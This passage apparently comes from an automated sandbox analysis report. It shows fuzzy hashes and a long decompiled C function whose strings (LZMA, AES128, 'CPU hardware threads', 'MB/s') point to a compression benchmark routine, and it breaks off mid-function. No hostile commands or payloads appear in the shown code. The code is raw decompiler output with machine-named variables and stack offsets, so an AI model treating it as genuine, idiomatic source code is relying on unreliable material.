                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 40d31a591b09a88cd15eb94093b210806a8ccbbbf5d54eed04b7ce3cec549aab
                                                                                                                    • Instruction ID: 0bef767cfb062775156b026a7dd37bf61e7d4fe66a5fe44e51199c46d234d61d
                                                                                                                    • Opcode Fuzzy Hash: 40d31a591b09a88cd15eb94093b210806a8ccbbbf5d54eed04b7ce3cec549aab
                                                                                                                    • Instruction Fuzzy Hash: C5A00271009101EBCE052B10ED0D4DD7B61EB84623B644499F047514708F314960FB01
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00B2AA45 Relevance: 90.0, APIs: 6, Strings: 44, Instructions: 2537COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00B2AA45(signed int __ecx, char* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t1109;
				unsigned int _t1110;
				char _t1111;
				void* _t1116;
				signed int _t1119;
				signed int _t1120;
				void* _t1123;
				signed int _t1124;
				signed char _t1125;
				signed int _t1130;
				void* _t1132;
				signed int _t1134;
				void* _t1135;
				void* _t1144;
				signed int _t1146;
				char* _t1148;
				signed int _t1149;
				char* _t1154;
				void* _t1158;
				signed int _t1159;
				void* _t1174;
				unsigned int _t1183;
				signed int _t1190;
				signed int _t1197;
				signed int _t1204;
				void* _t1207;
				void* _t1213;
				signed int _t1218;
				signed int _t1219;
				void* _t1220;
				signed int _t1226;
				signed int _t1247;
				signed int _t1252;
				signed int _t1253;
				void* _t1255;
				char* _t1260;
				void* _t1262;
				signed int _t1264;
				void* _t1265;
				char* _t1270;
				signed int _t1272;
				signed int _t1273;
				signed int _t1274;
				void* _t1276;
				signed int _t1282;
				signed int _t1301;
				signed int _t1302;
				signed int _t1304;
				void* _t1312;
				void* _t1332;
				void* _t1333;
				void* _t1334;
				void* _t1335;
				void* _t1336;
				signed int _t1337;
				signed int _t1343;
				signed int _t1344;
				void* _t1358;
				signed int _t1359;
				void* _t1362;
				void* _t1367;
				void* _t1369;
				signed int _t1371;
				void* _t1372;
				void* _t1376;
				signed int _t1378;
				signed int _t1380;
				intOrPtr _t1384;
				signed int _t1394;
				signed int _t1396;
				signed int _t1400;
				void* _t1426;
				signed int _t1427;
				void* _t1433;
				void* _t1434;
				void* _t1436;
				unsigned int _t1437;
				signed int _t1447;
				signed char _t1454;
				void* _t1462;
				unsigned int _t1469;
				signed int _t1470;
				signed int _t1476;
				void* _t1484;
				void* _t1489;
				signed int _t1491;
				char* _t1501;
				void* _t1502;
				void* _t1503;
				intOrPtr _t1509;
				void* _t1511;
				void* _t1516;
				void* _t1526;
				signed int _t1528;
				void* _t1534;
				signed int _t1542;
				signed int _t1543;
				signed int _t1544;
				signed int _t1545;
				signed int _t1546;
				void* _t1547;
				void* _t1550;
				signed int _t1553;
				signed int _t1554;
				signed int _t1555;
				signed int _t1556;
				signed int _t1559;
				void* _t1569;
				signed int _t1572;
				void* _t1578;
				signed int _t1581;
				void* _t1584;
				void* _t1587;
				void* _t1590;
				void* _t1592;
				void* _t1595;
				signed int _t1601;
				signed int _t1604;
				signed int _t1608;
				signed int _t1614;
				signed int _t1615;
				intOrPtr* _t1622;
				void* _t1624;
				signed int _t1626;
				intOrPtr* _t1629;
				void* _t1631;
				signed int _t1633;
				signed int _t1635;
				signed int _t1658;
				signed int _t1662;
				char* _t1680;
				signed int _t1717;
				signed int _t1762;
				signed int _t1768;
				void* _t1804;
				signed int _t1829;
				signed int _t1838;
				signed int _t1844;
				signed int _t1861;
				signed int _t1873;
				void* _t1876;
				void* _t1883;
				void* _t1888;
				char* _t1973;
				char* _t1983;
				signed int _t1984;
				char* _t1988;
				void* _t1994;
				char* _t1995;
				char* _t1996;
				char* _t2006;
				signed int _t2023;
				void* _t2059;
				signed int _t2073;
				signed int _t2075;
				intOrPtr* _t2076;
				signed int _t2078;
				signed int _t2080;
				char* _t2081;
				intOrPtr _t2084;
				unsigned int _t2085;
				signed int _t2086;
				signed int _t2087;
				signed int _t2088;
				void* _t2089;
				void* _t2093;
				intOrPtr _t2094;
				signed int _t2095;
				void* _t2096;
				void* _t2097;
				signed int _t2098;
				signed int _t2100;
				signed int _t2101;
				signed int _t2104;
				void* _t2105;
				signed int _t2107;
				signed int _t2108;
				signed int _t2109;
				signed int _t2110;
				signed int _t2111;
				intOrPtr _t2112;
				void* _t2113;
				signed int _t2114;
				unsigned int _t2116;
				unsigned int _t2117;
				intOrPtr* _t2119;
				signed int _t2120;
				char* _t2121;
				void* _t2124;
				signed int _t2125;
				signed int _t2126;
				signed int _t2127;
				unsigned int _t2128;
				signed int _t2132;
				signed int _t2133;
				intOrPtr _t2135;
				signed int _t2137;
				intOrPtr _t2138;
				void* _t2139;
				void* _t2141;
				char** _t2142;
				void* _t2149;

				_t2149 = __fp0;
				_t1973 = __edx;
				L00B7F140(E00B84264, _t2139);
				_t2142 = _t2141 - 0x398;
				 *(_t2139 - 0x1c) = __edx;
				_t1635 = __ecx;
				if(L00B2DB91(__edx) != 0) {
					_t2073 = 0;
					_t2100 = 1;
					 *((intOrPtr*)(_t2139 - 0x138)) = 0x80000000;
					 *((intOrPtr*)(_t2139 - 0x134)) = 0;
					 *(_t2139 - 0x144) = _t2100;
					 *(_t2139 - 0x140) = _t2100;
					_t1109 = E00B19810(_t2139 - 0x144);
					__eflags = _t1109;
					if(_t1109 == 0) {
						L5:
						_t1110 = L00B19823();
						L6:
						 *(_t2139 - 0x34) = _t1110;
						_t1111 = E00B19852(_t2139 - 0x138);
						 *(_t2139 - 0xd) =  *(_t2139 - 0xd) & 0x00000000;
						 *(_t2139 - 0x6e) =  *(_t2139 - 0x6e) & 0x00000000;
						 *(_t2139 - 0x6d) =  *(_t2139 - 0x6d) & 0x00000000;
						 *((char*)(_t2139 - 0xc4)) = _t1111;
						_t1640 = _t2139 - 0xf0;
						 *(_t2139 - 0x4c) =  *(_t2139 - 0x34);
						 *(_t2139 - 0xc8) = 0xfa0;
						 *(_t2139 - 0x94) = 0x16;
						 *(_t2139 - 0x78) = _t2073;
						 *(_t2139 - 0x74) = _t2073;
						 *(_t2139 - 0x80) = _t2073;
						 *(_t2139 - 0x7c) = 4;
						 *(_t2139 - 0x148) = _t2100;
						 *(_t2139 - 0x1a0) = _t2073;
						 *(_t2139 - 0x19c) = _t2073;
						 *(_t2139 - 0x198) = _t2100;
						E00B2CD7C(_t2139 - 0xf0);
						 *(_t2139 - 4) = _t2073;
						 *(_t2139 - 0x30) = _t2073;
						 *(_t2139 - 0x2c) = _t2073;
						 *(_t2139 - 0xe) =  *(_t2139 - 0xe) & 0x00000000;
						 *(_t2139 - 0xf) =  *(_t2139 - 0xf) & 0x00000000;
						__eflags = _t1635 - _t2073;
						 *(_t2139 - 4) = 1;
						if(_t1635 == _t2073) {
							L13:
							 *(_t2139 - 0x14) = _t2073;
							__eflags = 4[ *(_t2139 + 8)] - _t2073;
							if(__eflags <= 0) {
								L83:
								__eflags = _t1635 - _t2073;
								if(_t1635 == _t2073) {
									__eflags =  *(_t2139 + 0x14) - _t2073;
									if( *(_t2139 + 0x14) == _t2073) {
										L130:
										__eflags =  *(_t2139 - 0x4c) - 2;
										if( *(_t2139 - 0x4c) < 2) {
											L162:
											__eflags = _t1635;
											if(_t1635 != 0) {
												( *_t1635)[4]();
												( *_t1635)[4]();
												L00B2DD93(_t1635, _t1635, "size: ");
												 *(_t2139 - 4) = 0x10;
												_t1462 =  *( *_t1635)( *((intOrPtr*)(L00B29FC9(_t2139 - 0x184, _t2139 - 0x144, _t2073, __eflags))),  *((intOrPtr*)(_t2139 - 0xc4)),  *((intOrPtr*)(_t2139 - 0x138)),  *((intOrPtr*)(_t2139 - 0x134)), "CPU hardware threads:",  *(_t2139 - 0x34));
												 *(_t2139 - 4) = 1;
												E00B11E89(_t1462,  *((intOrPtr*)(_t2139 - 0x184)));
												( *_t1635)[4]();
											}
											L164:
											_t1116 = 1;
											__eflags =  *(_t2139 - 0x4c) - _t1116;
											if( *(_t2139 - 0x4c) < _t1116) {
												L481:
												_t2101 = 0x80070057;
												L482:
												L00B6B300( *(_t2139 - 0x30));
												L483:
												_t1102 = _t2139 - 4;
												 *_t1102 =  *(_t2139 - 4) | 0xffffffff;
												__eflags =  *_t1102;
												L00B298A8(_t2139 - 0xf0);
												_t1119 = _t2101;
												goto L484;
											}
											__eflags =  *(_t2139 - 0x4c) - 0x1000;
											if( *(_t2139 - 0x4c) > 0x1000) {
												goto L481;
											}
											_t1120 = L00B7F480(_t1116,  *(_t2139 - 0x94), 0);
											__eflags =  *(_t2139 - 0xf);
											 *(_t2139 - 0x68) = _t1120;
											 *(_t2139 - 0x64) = 0;
											if(__eflags != 0) {
												L169:
												 *(_t2139 + 0xb) = 1;
												L170:
												 *(_t2139 - 0x84) = L00B1D491(_t2139 - 0xf0, __eflags);
												_t1123 = E00B12735(_t2139 - 0x11c, __eflags, _t2139 - 0xe4);
												 *(_t2139 - 4) = 0x11;
												__eflags =  *(_t2139 - 0xe0);
												if( *(_t2139 - 0xe0) == 0) {
													_t1123 = E00B1275A(_t2139 - 0xe4, "LZMA");
												}
												__eflags =  *(_t2139 - 0x1c);
												if(__eflags == 0) {
													_t1124 = E00B12412( *((intOrPtr*)(_t2139 - 0xe4)), "CRC");
													__eflags = _t1124;
													if(_t1124 != 0) {
														E00B1275A(_t2139 - 0xe4, "crc32");
													}
													_t1125 = E00B1A63E(_t2139 - 0x1a8);
													 *(_t2139 - 0x45) =  *(_t2139 - 0x45) & 0x00000000;
													_t2075 = _t2073 | 0xffffffff;
													__eflags = _t1125;
													 *(_t2139 + 0x17) = _t1125;
													if(_t1125 == 0) {
														_t1447 = E00B1A578(_t2139 - 0x11c, 1, _t2139 - 0x1a8, _t2139 - 0x58, _t2139 - 0x45);
														__eflags =  *(_t2139 - 0x45);
														_t2075 = _t1447;
														if( *(_t2139 - 0x45) == 0) {
															_t2075 = _t2075 | 0xffffffff;
															__eflags = _t2075;
														}
													}
													L00B2DE4C(_t2139 - 0x2cc);
													_t1127 = L00B2DE8E(_t2139 - 0x2cc);
													__eflags =  *(_t2139 + 0x17);
													 *(_t2139 - 0x2a4) = _t1635;
													if( *(_t2139 + 0x17) != 0) {
														L343:
														__eflags = _t1635;
														if(_t1635 != 0) {
															__eflags =  *(_t2139 + 0xb);
															 *(_t2139 - 0xf8) =  *(_t2139 - 0x68);
															 *(_t2139 - 0xf4) =  *(_t2139 - 0x64);
															if( *(_t2139 + 0xb) == 0) {
																 *(_t2139 - 0xf8) = 0x8000000;
																 *(_t2139 - 0xf4) = 0;
															}
															__eflags =  *(_t2139 - 0xe);
															if( *(_t2139 - 0xe) != 0) {
																__eflags =  *(_t2139 + 0xb);
																_t1272 =  *(_t2139 - 0x2c);
																if( *(_t2139 + 0xb) != 0) {
																	__eflags =  *(_t2139 - 0xf4);
																	if(__eflags < 0) {
																		while(1) {
																			L354:
																			_t1130 = L00B1D46C(_t2139 - 0xf0, 1);
																			__eflags = _t1130;
																			if(_t1130 < 0) {
																				break;
																			}
																			E00B2EB43(_t2139 - 0xf0, _t1130);
																		}
																		 *(_t2139 - 0x13c) =  *(_t2139 - 0x13c) | 0xffffffff;
																		__eflags =  *(_t2139 + 0x17);
																		 *((intOrPtr*)(_t2139 - 0xc4)) = 0x1000;
																		 *(_t2139 - 0xcc) = 0;
																		if( *(_t2139 + 0x17) == 0) {
																			 *(_t2139 + 0x10) = 0;
																			_t2076 = 0xb8a834;
																			do {
																				E00B126FB(_t2139 - 0x28,  *_t2076);
																				 *(_t2139 - 4) = 0x14;
																				_t1132 = E00B126D9(_t2139 - 0xbc);
																				 *(_t2139 - 4) = 0x15;
																				_t2104 = E00B12276(_t1132,  *(_t2139 - 0x28), 0x3a);
																				__eflags = _t2104;
																				if(_t2104 >= 0) {
																					_t781 =  &(( *(_t2139 - 0x28))[1]); // 0x1
																					E00B1275A(_t2139 - 0xbc,  &(_t781[_t2104]));
																					__eflags = _t2104 -  *(_t2139 - 0x24);
																					if(_t2104 <  *(_t2139 - 0x24)) {
																						_t1260 =  *(_t2139 - 0x28);
																						 *(_t2139 - 0x24) = _t2104;
																						_t785 =  &(_t1260[_t2104]);
																						 *_t785 = _t1260[_t2104] & 0x00000000;
																						__eflags =  *_t785;
																					}
																				}
																				_t1134 = L00B2E965( *(_t2139 - 0x28),  *((intOrPtr*)(_t2139 - 0xe4)));
																				__eflags = _t1134;
																				if(_t1134 != 0) {
																					_t1134 = E00B12450( *((intOrPtr*)(_t2139 - 0xd8)),  *((intOrPtr*)(_t2139 - 0xbc)));
																					__eflags = _t1134;
																					 *(_t2139 - 0x13c) =  *(_t2139 + 0x10);
																					if(_t1134 != 0) {
																						_t1255 = E00B11E89(_t1134,  *((intOrPtr*)(_t2139 - 0xbc)));
																						_push( *(_t2139 - 0x28));
																						 *(_t2139 - 4) = 0x11;
																						L375:
																						E00B11E89(_t1255);
																						L376:
																						_t1658 =  *(_t2139 - 0xf8);
																						 *(_t2139 - 0x50) =  *(_t2139 - 0xf4);
																						asm("sbb eax, eax");
																						_t2105 = 0x100000;
																						 *(_t2139 - 0x54) = _t1658;
																						__eflags =  *(_t2139 - 0xe);
																						 *(_t2139 + 0x10) = ( ~( *(_t2139 + 0x17)) & 0x000000fe) + 3;
																						if( *(_t2139 - 0xe) == 0) {
																							L384:
																							_t1144 = L00B7F440( *(_t2139 + 0x10) *  *(_t2139 - 0x4c),  *(_t2139 + 0x10) *  *(_t2139 - 0x4c) >> 0x20,  *(_t2139 - 0x54),  *(_t2139 - 0x50));
																							asm("adc edi, edx");
																							E00B2E96A( *(_t2139 - 0x4c), _t2105 + _t1144, 0);
																							_t1146 = 0;
																							 *((intOrPtr*)(_t2139 - 0x40)) = 0;
																							 *(_t2139 - 0x3c) = 0;
																							 *((intOrPtr*)(_t2139 - 0x38)) = 0;
																							_t2078 =  *(_t2139 - 0x148);
																							 *(_t2139 - 4) = 0x16;
																							__eflags = _t2078 -  *(_t2139 - 0x4c);
																							if(_t2078 >  *(_t2139 - 0x4c)) {
																								L393:
																								__eflags =  *(_t2139 + 0x17);
																								 *(_t2139 - 0x98) =  *(_t2139 - 0x98) & 0x00000000;
																								_t1662 = (0 |  *(_t2139 + 0x17) == 0x00000000) + 1;
																								 *(_t2139 - 0x14) = _t1662;
																								 *(_t2139 - 0x74) =  *(_t2139 - 0x74) & 0x00000000;
																								_t2107 = _t1146 * _t1662;
																								 *(_t2139 - 4) = 0x18;
																								_t2080 = _t2107 << 3;
																								_push(_t2080);
																								_t1148 = E00B11E55();
																								_push(_t2080);
																								 *(_t2139 - 0x34) = _t1148;
																								 *(_t2139 - 0x98) = _t1148;
																								_t1149 = E00B11E55();
																								 *(_t2139 + 0x10) = _t1149;
																								__eflags = _t2107;
																								 *(_t2139 - 0x74) = _t1149;
																								if(_t2107 <= 0) {
																									L396:
																									( *_t1635)[4]();
																									_t2081 = 0;
																									__eflags = 0;
																									 *(_t2139 + 8) = 0;
																									do {
																										( *_t1635)[4]();
																										__eflags =  *(_t2139 + 8) - _t2081;
																										if( *(_t2139 + 8) != _t2081) {
																											__eflags =  *(_t2139 + 8) - 1;
																											_t1154 = "    ";
																											if( *(_t2139 + 8) != 1) {
																												_t1154 = "Size";
																											}
																										} else {
																											_t1154 = "THRD";
																										}
																										 *( *_t1635)(_t1154);
																										_t2108 = 0;
																										__eflags =  *(_t2139 - 0x3c) - _t2081;
																										if( *(_t2139 - 0x3c) > _t2081) {
																											while(1) {
																												__eflags = _t2108 - _t2081;
																												if(_t2108 != _t2081) {
																													E00B2E987(_t1635);
																												}
																												__eflags =  *(_t2139 + 8) - _t2081;
																												if(__eflags != 0) {
																													goto L408;
																												}
																												L407:
																												E00B2A2B1( *(_t2139 - 0x14) * 0xf - 0xf);
																												_t1994 = 0xe;
																												E00B2A24D(_t1635, _t1994, __eflags,  *((intOrPtr*)( *((intOrPtr*)(_t2139 - 0x40)) + _t2108 * 4)), _t2081);
																												L415:
																												_t2108 = _t2108 + 1;
																												__eflags = _t2108 -  *(_t2139 - 0x3c);
																												if(_t2108 <  *(_t2139 - 0x3c)) {
																													_t2081 = 0;
																													__eflags = 0;
																													__eflags = _t2108 - _t2081;
																													if(_t2108 != _t2081) {
																														E00B2E987(_t1635);
																													}
																													__eflags =  *(_t2139 + 8) - _t2081;
																													if(__eflags != 0) {
																														goto L408;
																													}
																												}
																												_t2081 = 0;
																												__eflags = 0;
																												goto L417;
																												L408:
																												__eflags =  *(_t2139 - 0x14) - _t2081;
																												if( *(_t2139 - 0x14) <= _t2081) {
																													goto L415;
																												}
																												_t2087 =  *(_t2139 - 0x14);
																												do {
																													__eflags =  *(_t2139 + 8) - 1;
																													_t1995 = "Usage";
																													if( *(_t2139 + 8) != 1) {
																														_t1995 = "%";
																													}
																													L00B2DEFD(_t1635, _t1995, 6);
																													__eflags =  *(_t2139 + 8) - 1;
																													_t1996 = "BW";
																													if( *(_t2139 + 8) != 1) {
																														_t1996 = "MB/s";
																													}
																													L00B2DEFD(_t1635, _t1996, 9);
																													_t2087 = _t2087 - 1;
																													__eflags = _t2087;
																												} while (_t2087 != 0);
																												goto L415;
																											}
																										}
																										L417:
																										 *(_t2139 + 8) =  *(_t2139 + 8) + 1;
																										__eflags =  *(_t2139 + 8) - 3;
																									} while ( *(_t2139 + 8) < 3);
																									( *_t1635)[4]();
																									__eflags =  *(_t2139 - 0x6e);
																									 *(_t2139 - 0x8c) = _t2081;
																									 *(_t2139 - 0x88) = _t2081;
																									 *(_t2139 - 0x18) = 0xa;
																									if( *(_t2139 - 0x6e) != 0) {
																										 *(_t2139 - 0x18) =  *(_t2139 - 0x94);
																									}
																									while(1) {
																										_t1158 = 1;
																										_t1983 = 0;
																										_t1159 = L00B7F480(_t1158,  *(_t2139 - 0x18), 0);
																										_t2109 =  *(_t2139 - 0x2c);
																										__eflags = 0;
																										 *(_t2139 - 0x6c) = _t2109;
																										if(0 > 0) {
																											goto L424;
																										}
																										if(0 < 0) {
																											L423:
																											__eflags =  *(_t2139 - 0xe);
																											if( *(_t2139 - 0xe) != 0) {
																												L425:
																												__eflags =  *(_t2139 + 0xc) - _t2081;
																												 *(_t2139 - 0x84) = _t2081;
																												if(__eflags <= 0) {
																													L459:
																													__eflags = 0 -  *(_t2139 - 0xf4);
																													if(__eflags > 0) {
																														L467:
																														_t1162 =  *(_t2139 - 0x8c) |  *(_t2139 - 0x88);
																														__eflags =  *(_t2139 - 0x8c) |  *(_t2139 - 0x88);
																														if(( *(_t2139 - 0x8c) |  *(_t2139 - 0x88)) == 0) {
																															L477:
																															_t2101 = 0;
																															__eflags = 0;
																															L478:
																															_t1127 = E00B11E89(E00B11E89(E00B11E89(_t1162,  *(_t2139 + 0x10)),  *(_t2139 - 0x34)),  *((intOrPtr*)(_t2139 - 0x40)));
																															goto L479;
																														}
																														 *( *_t1635)("Avg:");
																														 *(_t2139 + 8) =  *(_t2139 + 8) & 0x00000000;
																														__eflags =  *(_t2139 - 0x3c);
																														if( *(_t2139 - 0x3c) <= 0) {
																															L476:
																															_t1162 = ( *_t1635)[4]();
																															goto L477;
																														}
																														 *(_t2139 + 0x14) =  *(_t2139 + 0x10);
																														do {
																															__eflags =  *(_t2139 + 8);
																															if( *(_t2139 + 8) != 0) {
																																E00B2E987(_t1635);
																															}
																															__eflags =  *(_t2139 - 0x14);
																															if( *(_t2139 - 0x14) > 0) {
																																_t2110 =  *(_t2139 + 0x14);
																																_t2083 =  *(_t2139 - 0x34) -  *(_t2139 + 0x10);
																																__eflags =  *(_t2139 - 0x34) -  *(_t2139 + 0x10);
																																 *(_t2139 + 0xc) =  *(_t2139 - 0x14);
																																do {
																																	_t1174 = L00B7F310( *((intOrPtr*)(_t2110 + _t2083)), ( &(4[_t2083]))[_t2110],  *(_t2139 - 0x8c),  *(_t2139 - 0x88));
																																	_push(_t1983);
																																	_push(_t1174);
																																	E00B2E9CE(_t1635, __eflags, L00B7F310( *_t2110, 4[_t2110],  *(_t2139 - 0x8c),  *(_t2139 - 0x88)), _t1983);
																																	_t2110 = _t2110 + 8;
																																	_t1087 = _t2139 + 0xc;
																																	 *_t1087 =  *(_t2139 + 0xc) - 1;
																																	__eflags =  *_t1087;
																																} while ( *_t1087 != 0);
																															}
																															 *(_t2139 + 8) =  *(_t2139 + 8) + 1;
																															 *(_t2139 + 0x14) =  *(_t2139 + 0x14) + ( *(_t2139 - 0x14) << 3);
																															__eflags =  *(_t2139 + 8) -  *(_t2139 - 0x3c);
																														} while ( *(_t2139 + 8) <  *(_t2139 - 0x3c));
																														goto L476;
																													}
																													if(__eflags < 0) {
																														L462:
																														 *(_t2139 - 0x18) =  *(_t2139 - 0x18) + 1;
																														_t2081 = 0;
																														continue;
																													}
																													__eflags =  *(_t2139 - 0x6c) -  *(_t2139 - 0xf8);
																													if( *(_t2139 - 0x6c) >=  *(_t2139 - 0xf8)) {
																														goto L467;
																													}
																													goto L462;
																												} else {
																													goto L426;
																												}
																												do {
																													L426:
																													_t1983 =  *(_t2139 - 0x18);
																													E00B2E991(_t1635, _t1983, __eflags);
																													 *(_t2139 + 8) =  *(_t2139 + 8) & 0x00000000;
																													__eflags =  *(_t2139 - 0x3c);
																													if( *(_t2139 - 0x3c) <= 0) {
																														goto L458;
																													}
																													_t1183 =  *(_t2139 - 0x34);
																													_t2111 =  *(_t2139 + 0x10);
																													 *(_t2139 - 0x1c) = _t1183;
																													 *(_t2139 - 0x44) = _t1183;
																													_t921 = _t2139 - 0x1c;
																													 *_t921 =  *(_t2139 - 0x1c) - _t2111;
																													__eflags =  *_t921;
																													 *(_t2139 - 0x110) = _t2111;
																													while(1) {
																														_t1162 = ( *_t1635)[8]();
																														_t1984 = 0;
																														__eflags = _t1162;
																														if(_t1162 != 0) {
																															break;
																														}
																														__eflags =  *(_t2139 + 0x17);
																														_t1680 =  *( *((intOrPtr*)(_t2139 - 0x40)) +  *(_t2139 + 8) * 4);
																														if( *(_t2139 + 0x17) == 0) {
																															_t2084 = 0x20;
																															_t2112 = _t2084;
																															__eflags = E00B122ED( *((intOrPtr*)(_t2139 - 0xe4)), "AES128");
																															if(__eflags == 0) {
																																__eflags = E00B122ED( *((intOrPtr*)(_t2139 - 0xe4)), "AES192");
																																if(__eflags == 0) {
																																	L442:
																																	_push(_t2139 - 0xf0);
																																	 *((intOrPtr*)(_t2139 - 0x290)) = _t2112;
																																	L00B2DAEA(_t2139 - 0x16c, __eflags);
																																	_t1190 =  *(_t2139 - 0x13c);
																																	 *(_t2139 - 4) = 0x19;
																																	__eflags = _t1190;
																																	if(_t1190 < 0) {
																																		__eflags =  *(_t2139 - 0x45);
																																		if( *(_t2139 - 0x45) == 0) {
																																			 *(_t2139 - 0x29c) = 0x400;
																																			 *(_t2139 - 0x294) = 0x40;
																																		} else {
																																			_t1218 = 4;
																																			 *(_t2139 - 0x29c) = _t1218;
																																			 *(_t2139 - 0x294) = _t1218;
																																		}
																																		_t980 = _t2139 - 0x298;
																																		 *_t980 =  *(_t2139 - 0x298) & 0x00000000;
																																		__eflags =  *_t980;
																																	} else {
																																		_t1219 = _t1190 + _t1190 * 2;
																																		_t1220 = 0xb8a820 + _t1219 * 8;
																																		 *(_t2139 - 0x29c) =  *(0xb8a828 + _t1219 * 8);
																																		 *(_t2139 - 0x294) =  *(_t1220 + 0x10);
																																		 *(_t2139 - 0x298) =  *(_t1220 + 0xc);
																																		_t2084 =  *((intOrPtr*)(_t1220 + 4));
																																	}
																																	 *(_t2139 - 0x2c8) =  *(_t2139 - 0x2c8) & 0x00000000;
																																	__eflags = E00B12412( *(_t2139 - 0x160), "LZMA");
																																	if(__eflags == 0) {
																																		L451:
																																		_push(_t2139 - 0x2a0);
																																		_push(_t2139 - 0x2cc);
																																		_push(_t1635);
																																		_push(_t2084);
																																		_push( *(_t2139 - 0x30));
																																		_push( *(_t2139 - 0x6c));
																																		_push(_t2139 - 0x16c);
																																		_push(_t2139 - 0x1a0);
																																		_push( *(_t2139 - 0x7c));
																																		_t1988 =  *( *((intOrPtr*)(_t2139 - 0x40)) +  *(_t2139 + 8) * 4);
																																		_push( *(_t2139 - 0x80));
																																		_t1197 = E00B2CDBD(0, _t1988, __eflags);
																																		_t2101 = _t1197;
																																		__eflags = _t2101;
																																		if(_t2101 != 0) {
																																			goto L466;
																																		}
																																		__eflags =  *(_t2139 + 8) - _t1197;
																																		if( *(_t2139 + 8) != _t1197) {
																																			E00B2E987(_t1635);
																																		}
																																		_t2085 =  *(_t2139 - 0x44);
																																		_t1204 =  *(_t2139 + 0x10) -  *(_t2139 - 0x34);
																																		__eflags = _t1204;
																																		_t2113 = _t2139 - 0x23c;
																																		 *(_t2139 - 0x10c) = 2;
																																		 *(_t2139 - 0x58) = _t1204;
																																		do {
																																			 *(_t2139 - 0xb8) = L00B27B92(_t1635, _t2113, _t2085, _t2113, _t2149);
																																			 *(_t2139 - 0xb4) = _t1988;
																																			_t1207 = L00B27C89(_t2113, L00B7F440( *((intOrPtr*)(_t2113 + 0x30)),  *((intOrPtr*)(_t2113 + 0x34)),  *((intOrPtr*)(_t2113 + 0x20)),  *((intOrPtr*)(_t2113 + 0x24))), _t1988);
																																			 *(_t2139 - 0x20) = _t1988;
																																			 *((intOrPtr*)( *(_t2139 - 0x58) + _t2085)) =  *((intOrPtr*)( *(_t2139 - 0x58) + _t2085)) +  *(_t2139 - 0xb8);
																																			_t1988 =  *(_t2139 - 0xb4);
																																			asm("adc [ecx+0x4], edx");
																																			 *_t2085 =  *_t2085 + _t1207;
																																			_push( *(_t2139 - 0x20));
																																			_push(_t1207);
																																			asm("adc [edi+0x4], ecx");
																																			E00B2E9CE(_t1635, __eflags,  *(_t2139 - 0xb8), _t1988);
																																			_t2085 = _t2085 + 8;
																																			_t2113 = _t2113 + 0x38;
																																			_t1029 = _t2139 - 0x10c;
																																			 *_t1029 =  *(_t2139 - 0x10c) - 1;
																																			__eflags =  *_t1029;
																																		} while ( *_t1029 != 0);
																																		 *(_t2139 - 4) = 0x18;
																																		L00B298A8(_t2139 - 0x16c);
																																		_t2114 =  *(_t2139 - 0x110);
																																		L457:
																																		 *(_t2139 + 8) =  *(_t2139 + 8) + 1;
																																		 *(_t2139 - 0x44) =  *(_t2139 - 0x44) + 0x10;
																																		_t2114 = _t2114 + 8;
																																		__eflags =  *(_t2139 + 8) -  *(_t2139 - 0x3c);
																																		 *(_t2139 - 0x110) = _t2114;
																																		if( *(_t2139 + 8) <  *(_t2139 - 0x3c)) {
																																			continue;
																																		}
																																		goto L458;
																																	} else {
																																		 *(_t2139 - 0x12a) =  *(_t2139 - 0x12a) & 0x00000000;
																																		 *(_t2139 - 0x12c) = 0x13;
																																		 *(_t2139 - 0x124) =  *(_t2139 - 0x18);
																																		 *(_t2139 - 4) = 0x1a;
																																		_t1213 = L00B12E16(_t2139 - 0x184, "d");
																																		 *(_t2139 - 4) = 0x1b;
																																		_push(_t2139 - 0x12c);
																																		_push(_t1213);
																																		_t2101 = L00B1DF13(_t2139 - 0x16c);
																																		E00B11E89(_t1214,  *((intOrPtr*)(_t2139 - 0x184)));
																																		__eflags = _t2101;
																																		if(_t2101 != 0) {
																																			L00B19312(_t2139 - 0x12c);
																																			L466:
																																			 *(_t2139 - 4) = 0x18;
																																			E00B11E89(E00B11E89(E00B11E89(E00B11E89(L00B298A8(_t2139 - 0x16c),  *(_t2139 + 0x10)),  *(_t2139 - 0x34)),  *((intOrPtr*)(_t2139 - 0x40))),  *((intOrPtr*)(_t2139 - 0x11c)));
																																			goto L482;
																																		}
																																		 *(_t2139 - 4) = 0x19;
																																		L00B19312(_t2139 - 0x12c);
																																		goto L451;
																																	}
																																}
																																_push(0x18);
																																L441:
																																_pop(_t2112);
																																goto L442;
																															}
																															_push(0x10);
																															goto L441;
																														}
																														__eflags =  *(_t2139 - 0x18) - 0x11;
																														 *((intOrPtr*)(_t2139 - 0x104)) = 0;
																														 *(_t2139 - 0x100) = 0;
																														 *(_t2139 - 0x54) = 0;
																														 *(_t2139 - 0x50) = 0;
																														if( *(_t2139 - 0x18) == 0x11) {
																															__eflags =  *(_t2139 - 0xe);
																															if( *(_t2139 - 0xe) == 0) {
																																_t1984 =  *(_t2139 - 0xcc);
																															}
																														}
																														_push(0);
																														_push(0);
																														_push(0);
																														_push(0);
																														_push(0);
																														_push(_t2139 - 0x1a0);
																														_push(_t1635);
																														_push(_t2139 - 0xf0);
																														_push(_t1984);
																														_push(1);
																														_push( *((intOrPtr*)(_t2139 - 0xc4)));
																														_push(_t2139 - 0x54);
																														_push(_t2139 - 0x104);
																														_push( *(_t2139 - 0x30));
																														_push( *(_t2139 - 0x7c));
																														_push( *(_t2139 - 0x80));
																														_t1226 = E00B2E153(_t1680,  *(_t2139 - 0x6c), _t2149);
																														_t2086 = _t1226;
																														__eflags = _t2086;
																														if(_t2086 != 0) {
																															E00B11E89(E00B11E89(E00B11E89(E00B11E89(_t1226,  *(_t2139 + 0x10)),  *(_t2139 - 0x34)),  *((intOrPtr*)(_t2139 - 0x40))),  *((intOrPtr*)(_t2139 - 0x11c)));
																															L00B6B300( *(_t2139 - 0x30));
																															goto L342;
																														} else {
																															__eflags =  *(_t2139 + 8) - _t1226;
																															if(__eflags != 0) {
																																E00B2E987(_t1635);
																															}
																															_push( *(_t2139 - 0x100));
																															_push( *((intOrPtr*)(_t2139 - 0x104)));
																															E00B2E9CE(_t1635, __eflags,  *(_t2139 - 0x54),  *(_t2139 - 0x50));
